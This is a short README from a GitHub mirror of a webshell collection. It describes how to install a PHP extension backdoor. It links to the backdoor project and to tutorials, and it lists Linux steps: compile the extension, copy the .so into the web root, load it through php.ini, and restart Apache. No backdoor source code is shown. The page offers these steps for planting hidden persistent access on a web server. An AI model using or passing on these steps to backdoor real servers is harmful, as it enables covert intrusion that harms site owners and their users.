1
0
mirror of https://github.com/tennc/webshell.git synced 2025-12-06 12:51:28 +00:00
Files
webshell/php/php-extension-backdoor.md
2014-09-24 16:25:44 +08:00

20 lines
367 B
Markdown

author:akamajoris
url:https://github.com/akamajoris/php-extension-backdoor
Windows: http://stackoff.ru/pishem-rasshirenie-bekdor-dlya-php/
Linux:
sudo apt-get install php5-dev
phpize && ./configure && make
chmod xxx.so
copy xxx.so to /var/www
edit php.ini
add extension=/var/www/xxx.so
restart apache
test success!! ^_^
demo:http://drops.wooyun.org/tips/3003